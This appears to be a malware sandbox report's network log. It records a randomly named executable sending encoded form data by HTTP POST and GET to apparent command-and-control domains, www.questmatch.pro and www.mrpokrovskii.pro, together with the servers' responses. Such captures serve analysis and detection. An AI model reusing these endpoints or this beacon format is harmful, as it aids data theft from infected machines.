                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0LoelQiyAh3%2Fck2w7eEEFiO33fPjZz1k2vxOqV2rmz8%2B6LRrA%2BwsmwsBcMxyNaaQciJkaBfI7BrcB0OLeHKmcA5dS31F0kLKQVG23UHgbxwHEOrR8PZtfM1nptnAAxfMCb6Q%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca39daff8f791-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2772&delivery_rate=0&cwnd=120&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cb 0a 83 30 10 45 7f 25 cc da 60 6c d3 50 f3 01 05 37 b6 50 77 a5 8b 31 8f 56 9a 66 20 46 a8 88 ff 5e c4 f5 3d 9c 73 17 e8 c9 ce a0 e3 14 42 01 2e 25 4a 23 e8 05 0c 59 07 5a 0a 59 40 c4 af 03 0d 2d 65 76 a1
                                                                                                            Data Ascii: b5$0E%`lP7Pw1Vf F^=sB.%J#YZY@-ev
                                                                                                            Dec 12, 2024 10:20:33.240577936 CET107INData Raw: 29 5a 28 c0 ba 8c 43 18 41 3f a0 25 f6 c6 68 83 4b cc 6f 2b f3 94 d8 ed 7a ef 58 59 cd 3f 53 c2 73 dd f8 7e 7a 35 d1 d3 ae 4e c9 05 cc 03 c5 c6 82 06 ac 4d 7d c6 5e 71 ef a5 e1 52 1e 04 af 95 40 7e f4 ca c8 ea 24 9c aa b6 e6 98 d1 7c ba 84 c6 ed
                                                                                                            Data Ascii: )Z(CA?%hKo+zXY?Ss~z5NM}^qR@~$|oW50


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.2249168188.114.97.6801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:34.645442009 CET811OUTPOST /1yxc/ HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.questmatch.pro
                                                                                                            Referer: http://www.questmatch.pro/1yxc/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 50 73 55 49 33 6c 67 63 2b 47 73 61 43 51 6b 49 61 35 63 43 41 57 70 64 45 4f 70 54 4c 2b 67 68 39 57 61 68 45 2f 72 77 50 52 35 54 32 4f 2f 52 75 42 47 34 74 4c 52 51 72 65 77 48 73 49 49 2f 77 46 78 38 2b 32 59 45 66 7a 50 4e 54 6c 6f 74 56 45 54 70 45 49 55 62 52 55 35 2b 46 66 63 72 71 6a 77 46 56 74 4b 69 55 75 4a 61 6f 2f 53 46 35 35 53 66 69 52 58 76 72 61 6a 35 65 75 6c 50 56 4f 66 53 4e 6d 47 48 30 72 32 66 70 52 2f 67 30 37 51 74 7a 42 73 78 74 4f 4a 63 68 79 32 37 7a 53 5a 77 2b 37 49 38 56 6f 32 56 32 34 61 54 39 77 61 55 67 3d 3d
                                                                                                            Data Ascii: x4=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtzBsxtOJchy27zSZw+7I8Vo2V24aT9waUg==
                                                                                                            Dec 12, 2024 10:20:35.908523083 CET1236INHTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:35 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 09c40d58-d18c-4f92-b833-326380c1bb17
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmaArIK2uCa1Lw%2BeEjEm4qtTKF2nc%2B0fKMHRnweSYUzUFNISeKCCYCXIGglPdKIzIGofrsfJN1IX8gFlfG12yLDabE99C4Ck0eEfPbLHGPKgCCs%2BVYheTcL9uL%2B1y82ImTBUJBY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3ae4d9b43d0-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cb 0a 82 40 18 46 5f 65 f8 d6 23 de a6 b2 79 80 c0 8d 05 b9 8b 16 73 b3 a4 69 7e 18 15 12 f1 dd 43 5c 9f c3 e1 2c d0 64 67 c8 30 79 cf e1 62 a4 38 40 2e 30 64 1d a4 c8 04 47 50 5f 07 89 86 46 76 a1 29 58 70 58
                                                                                                            Data Ascii: b5$@F_e#ysi~C\,dg0yb8@.0dGP_Fv)XpX
                                                                                                            Dec 12, 2024 10:20:35.908814907 CET106INData Raw: 37 aa de 0f 90 0f 34 c4 de 2a 58 ef 22 eb 36 ca 3a 8a ec 76 bd b7 2c cd e7 9f 49 f1 5c 37 5f 4f af 3a 74 b4 a7 63 74 5e 8d 3d 85 da 42 22 3b 1b 91 d9 43 95 d8 bc 32 89 e8 ce 45 a2 ab b2 4c ca e2 58 56 99 c9 b5 ce 4f e0 18 46 65 3e 6d 54 c6 ed b7
                                                                                                            Data Ascii: 74*X"6:v,I\7_O:tct^=B";C2ELXVOFe>mT"s0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.2249169188.114.97.6801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:37.306662083 CET2472OUTPOST /1yxc/ HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.questmatch.pro
                                                                                                            Referer: http://www.questmatch.pro/1yxc/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 68 50 48 57 33 44 36 55 44 36 46 62 57 75 63 55 4c 51 78 67 58 2b 47 76 52 69 51 6b 44 36 35 51 43 41 53 70 64 46 37 79 54 35 53 67 76 4b 61 61 68 6d 48 72 32 50 52 35 56 32 4f 46 53 65 42 71 34 74 66 64 51 72 75 4f 48 70 77 49 38 58 68 78 31 63 4f 62 4b 50 7a 4a 62 6a 6c 72 74 56 45 47 70 45 5a 64 62 52 51 44 2b 46 48 63 72 59 37 77 55 56 74 4a 74 30 75 4a 61 6f 2f 47 46 35 34 4a 66 6d 39 50 76 76 4f 7a 34 73 6d 6c 50 78 61 66 56 65 2b 42 42 30 72 74 53 4a 51 56 6d 31 65 37 31 51 78 63 76 63 69 54 57 6c 2b 70 32 6a 4f 66 32 65 76 54 39 77 6b 2b 54 69 70 4b 54 4d 68 7a 44 5a 5a 33 6f 45 6d 48 31 61 35 2b 67 34 68 32 77 39 72 51 4a 61 50 6b 73 65 32 50 71 4f 69 6f 6e 34 71 50 6e 72 68 49 50 73 4d 69 51 7a 43 4c 73 6c 53 57 43 56 50 66 53 44 59 2f 61 37 4c 47 64 78 59 6f 73 50 75 77 4e 38 74 38 57 32 4b 66 71 45 56 52 2f 59 41 30 47 43 69 6a 4f 4b 69 46 34 30 67 68 48 71 70 65 38 39 66 45 4e 61 34 6f 65 57 68 41 7a 6b 66 30 62 50 32 31 4c 45 6f 78 44 48 46 5a 6c 71 35 6d 66 61 36 62 72 69 33 [TRUNCATED]
                                                                                                            Data Ascii: x4=hPHW3D6UD6FbWucULQxgX+GvRiQkD65QCASpdF7yT5SgvKaahmHr2PR5V2OFSeBq4tfdQruOHpwI8Xhx1cObKPzJbjlrtVEGpEZdbRQD+FHcrY7wUVtJt0uJao/GF54Jfm9PvvOz4smlPxafVe+BB0rtSJQVm1e71QxcvciTWl+p2jOf2evT9wk+TipKTMhzDZZ3oEmH1a5+g4h2w9rQJaPkse2PqOion4qPnrhIPsMiQzCLslSWCVPfSDY/a7LGdxYosPuwN8t8W2KfqEVR/YA0GCijOKiF40ghHqpe89fENa4oeWhAzkf0bP21LEoxDHFZlq5mfa6bri3WKJqXn8MpHXTG0jyEmiiopmIgZt64sOH43JvjXdKwxveIgzPWsoC6fPJsBDVB91UYZe3oyA2bvGxt9W32fWnsivGnPg+ZBTWcVL+hGWyhEM0DzEU+geAXTgoRF7R40XoPRzFVmtjoRYs0pNelqkBL+WMzpyiY2291qJP3jflpKrAJY3gW87dwhOc+A4txxS1kfBDe+JLXMFeCATu+6k2hsI7THsrPSJSOe6Vgj+/Bbycdt6OR7Jej0OVwApTVhUTr7JjE8FKRThwaSDReY+Ezb+z59mUODiWmDs0XhuK6QIHBXTcgnGUGiMeFdGxW6s7V3FVTsDoE+47WB0lF64YGdhMp36UgywrUlBaGC1pHcy9iHZETEsdrDW3kLZaITmZ5jm14y+kP1nRttkDZBAKpeWz17E8nRHKXvSXfbGL7uPHjfSNuubS/PevMZ9NifYa1INIttbbvy3zTFW4Mu0fa/5yKbCr5hJ5YFsaEuj9iXcU/z14bMYhFnNyR9929r8os1g8eTa2yhgpEnoZcsw4TVZUr1MuQAtzQSmE938Ua/MMRFnvlBbA/QbWLGnrTlALc0W/Dds8n9TQRXHQJnyogdKXwnPhB60Ed90ViX51iOL/8hjepRO/zGQNygZGXW8ug9P9iTFijnMkY1QlAR/uoBkR55JGosUlru [TRUNCATED]
                                                                                                            Dec 12, 2024 10:20:37.427007914 CET1764OUTData Raw: 53 4f 6e 6f 4b 47 41 49 57 47 44 6b 6c 5a 69 46 34 4b 48 72 43 59 71 42 4f 57 57 31 69 77 76 68 78 54 5a 7a 7a 44 33 42 68 72 36 4f 64 4e 42 67 5a 64 4b 55 59 72 70 35 68 38 4c 52 54 66 37 62 36 57 78 63 56 48 73 78 61 54 6e 44 6e 35 69 43 74 6d
                                                                                                            Data Ascii: SOnoKGAIWGDklZiF4KHrCYqBOWW1iwvhxTZzzD3Bhr6OdNBgZdKUYrp5h8LRTf7b6WxcVHsxaTnDn5iCtmgi2WotYBE8ScOcZQVJpyQloE583GXugCCC4kJR0CtCJc6WQYl77/6WoqvgBmzIFDbw3BreTfsZBUUlrblTpTATbzBHLSpyaIMSQTYkzHgppIiTFlBSmkAEecO7siwHxBCQB76b0B0I0mEylYH/ZevZDo46A5CZTLq
                                                                                                            Dec 12, 2024 10:20:38.560563087 CET1236INHTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:38 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 5cdc8d0f-e68a-4f17-9b44-f9936aec3b03
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvuMPJVdA0PMZE7sxSKPB9FHSpcdqZadxGbuzrlJfIr99MWvgyrur9g%2BHCi44UXXpjFxt6D10yY8XZlk678Dh7eZoKdcmLdo7ltubzCaKnqxRe05oojZTmVdU3RLGnnbgvutwvg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3bedd48426b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4236&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a c2 30 14 06 af 12 be 75 4b 2b 8d d5 e6 00 82 9b 2a d8 9d b8 c8 cf 8b 8a 31 0f d2 14 14 e9 dd a5 74 3d c3 30 3f 18 76 5f a8 38 85 50 80 52 e2 34 42 fd 60 d9 11 94 ac 65 81 a8 df 04 85 9e b3 38 f0 14 1d 0a 38 ca fa 19 46
                                                                                                            Data Ascii: b5$M0uK+*1t=0?v_8PR4B`e88F
                                                                                                            Dec 12, 2024 10:20:38.560585976 CET101INData Raw: a8 2b 7a 16 0f 1d 5d a0 24 fc 42 85 e7 24 ce a7 cb 20 aa cd f7 63 2b dc e6 c5 37 d3 fd 18 3d af e9 94 28 e8 fc e4 78 74 50 d8 5a 67 f7 ae f6 25 b5 7b 5d 4a bf d9 95 9d 91 b2 f4 5d d7 b4 9a 6c 63 ea 06 05 c6 ac ed 6b 48 da d2 7a 3b cf 7f 00 00 00
                                                                                                            Data Ascii: +z]$B$ c+7=(xtPZg%{]J]lckHz;DV0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.2249170188.114.97.6801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:40.044104099 CET543OUTGET /1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:20:41.230292082 CET1236INHTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 78068bbf-3dab-4d17-b579-445b85c3861f
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5besRcxkG6ivF0dRpiwlkdT3yE7PIvIFJJt3qrLXyicQEqcXXnfz6go%2FhbosMrgJDK0pfbOf22b3dE4x8J4hyz7c4q4O04if2fvLznkhWRWQjUP6zB%2B%2FwXYt%2F4OFWrLKnHGXG4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3cf8d030cb4-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=543&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 31 79 78 63 2f 22 5d 7d 2c 22 64 65 62 75 67
                                                                                                            Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /1yxc/"]},"debug
                                                                                                            Dec 12, 2024 10:20:41.230309963 CET88INData Raw: 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 37 38 30 36 38 62 62 66 2d 33 64 61 62 2d 34 64 31 37 2d 62 35 37 39 2d 34 34 35 62 38 35 63 33 38 36 31 66 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d
                                                                                                            Data Ascii: Info":{"correlationId":"78068bbf-3dab-4d17-b579-445b85c3861f","stackTrace":null}}0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.224917185.25.177.138801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:47.008343935 CET2472OUTPOST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 39 57 57 51 65 49 4c 65 62 73 57 42 50 72 30 42 4d 63 67 75 48 35 4b 65 4d 76 4b 43 65 7a 76 2f 7a 6c 6d 46 56 45 58 57 54 65 47 48 73 7a 66 51 39 44 32 47 76 2b 62 37 78 58 2b 54 31 5a 46 38 57 36 41 47 69 57 48 58 57 44 33 6d 6c 7a 41 55 67 79 50 2b 58 75 33 31 63 71 71 7a 52 6c 6f 59 43 6b 47 43 32 74 4a 77 67 61 38 66 51 34 61 6b 61 48 77 75 78 7a 48 72 5a 47 57 6a 6a 31 73 6a 50 68 73 4d 37 75 5a 66 4f 51 4d 4d 35 32 52 65 55 63 63 79 6e 33 6d 39 56 78 32 36 4f 4e 48 6b 54 68 65 46 6c 41 4b 45 36 4b 71 4c 47 56 56 71 41 5a 4f 5a 73 63 50 34 4d 2f 6c 4f 41 42 45 44 66 33 7a 6e 6e 74 4e 6e 4b 33 46 41 77 46 38 7a 68 61 2b 75 38 6f 78 45 39 70 46 77 6e 61 6e 5a 2f 6c 63 31 46 32 77 36 6f 45 76 71 4e 6d 57 4f 7a 6d 30 78 36 33 4f 45 2b 6a 51 39 64 75 73 39 6e 6b 57 74 64 55 2b 4c 43 46 38 55 76 70 31 58 61 54 75 43 38 33 77 4d 6d 79 32 79 50 6c 4d 4e 34 4a 65 79 32 58 79 37 48 62 7a 57 6d 69 35 55 62 32 74 34 74 4d 54 69 34 38 73 73 36 52 2f 2f 38 43 6b [TRUNCATED]
                                                                                                            Data Ascii: x4=s4z0josg0gQQ9WWQeILebsWBPr0BMcguH5KeMvKCezv/zlmFVEXWTeGHszfQ9D2Gv+b7xX+T1ZF8W6AGiWHXWD3mlzAUgyP+Xu31cqqzRloYCkGC2tJwga8fQ4akaHwuxzHrZGWjj1sjPhsM7uZfOQMM52ReUccyn3m9Vx26ONHkTheFlAKE6KqLGVVqAZOZscP4M/lOABEDf3znntNnK3FAwF8zha+u8oxE9pFwnanZ/lc1F2w6oEvqNmWOzm0x63OE+jQ9dus9nkWtdU+LCF8Uvp1XaTuC83wMmy2yPlMN4Jey2Xy7HbzWmi5Ub2t4tMTi48ss6R//8Ckk5yUXop1C1xyfks6wzgcXR9r/KIwZP2UMa1yVh7fA7KJGzU1AV7v8tn6vcPhHsoSISQb0+j3495Ij710Evm6pU2QwuLd9NDYxYdZ+xeir9dpoXyuF5wmadSqOhootEzpooZY+n+l1B02c8urrDYqE1L/duV1nyZwEVuUyeDPI7Ojjzc23TjgRH1tFoUznvTsFVYM1TQHGsYBFjI8GuduXnJmFZ+DuSPWhwGS97uZKyH+O8jST+WakQ57LLDdFFrIJUTLrUcfGo0Em/SXc3D4gcJvZ8t3hiDGrtU/Vq51BH6uisTq276SD3gnPaJDAQYcXTbJdFhHJ233uBPO3oMZWZUVERk8jF2jAZLGdtpszKsvhiNHtXKlpwruHdI7oDDPO1Px6rFxY1gFSzJSVH6kFXmg20bnHneGdF8i4Wh3sobH+QcXvNryfZDB9mWYb0GTojUfjjSmtuZUwqWoNgFbGdpgIs+I69VtWhYNYqjdohrzrS/qR7WCOOUFr3aAuMaJhhu7NZUzEnto39tMBhRJdBF8G43wg/uyhNoWRykfyFt/i2ujGWY+bGOGaNmIlUQDBuuNrFrS5oiARS3ZnVEBJX0dOe3ONCgKzWnnx22fhh3A27kL1GGa7kghBR2L/VH/jB9uuYHnAAnoDhjFmFtvGVWaPuxO7+5nlr [TRUNCATED]
                                                                                                            Dec 12, 2024 10:20:47.127778053 CET306OUTData Raw: 44 48 38 4b 35 41 32 72 77 57 6f 2b 32 35 73 65 77 67 77 4c 63 4c 67 64 4c 43 41 59 5a 42 32 34 75 34 64 71 6d 6c 4f 48 34 45 2f 70 6b 66 35 75 38 69 64 41 36 58 4f 36 7a 2b 53 69 78 77 51 30 79 68 55 78 2f 45 4b 37 2f 51 4d 2b 45 6d 74 6b 4e 4a
                                                                                                            Data Ascii: DH8K5A2rwWo+25sewgwLcLgdLCAYZB24u4dqmlOH4E/pkf5u8idA6XO6z+SixwQ0yhUx/EK7/QM+EmtkNJlIHhVJyfgcL1ZQJvLPZUXVFEsKhov8mBOZ+aKJbS+ayRujBMVo7sj+fRZRAfI56C3bu1eg1DGOwtnnaVdhAPSUxRR3uJdELpaJCE7+65pBVCDTiCB/RtbpRuZG8o3smePSFIWuGoZsp5IiSFjL9YYH3L8s8P1Gag/
                                                                                                            Dec 12, 2024 10:20:48.270581007 CET462INHTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:48 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.224917285.25.177.138801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:49.667020082 CET817OUTPOST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 39 55 2b 51 66 5a 4c 65 5a 4d 57 42 4b 72 30 42 62 4d 67 30 48 35 57 4a 4d 75 65 72 5a 45 7a 2f 30 77 69 46 56 33 2f 57 55 65 47 41 6d 54 66 71 77 6a 32 54 76 2b 62 42 78 57 43 54 31 5a 35 38 57 59 6f 47 79 58 48 55 4c 44 33 67 6f 54 41 52 67 79 44 4e 58 75 37 62 63 72 65 7a 52 67 67 59 4e 45 57 43 67 2f 68 77 6c 71 38 56 41 34 62 79 61 47 4d 37 78 7a 58 30 5a 46 43 6a 6a 48 49 6a 50 30 51 4d 2f 35 4e 66 46 77 4d 42 77 57 52 4b 45 74 6c 5a 74 6d 4b 31 58 41 71 7a 57 4e 48 34 54 6d 50 45 72 7a 69 64 78 49 32 36 4a 54 35 39 43 36 66 39 32 77 3d 3d
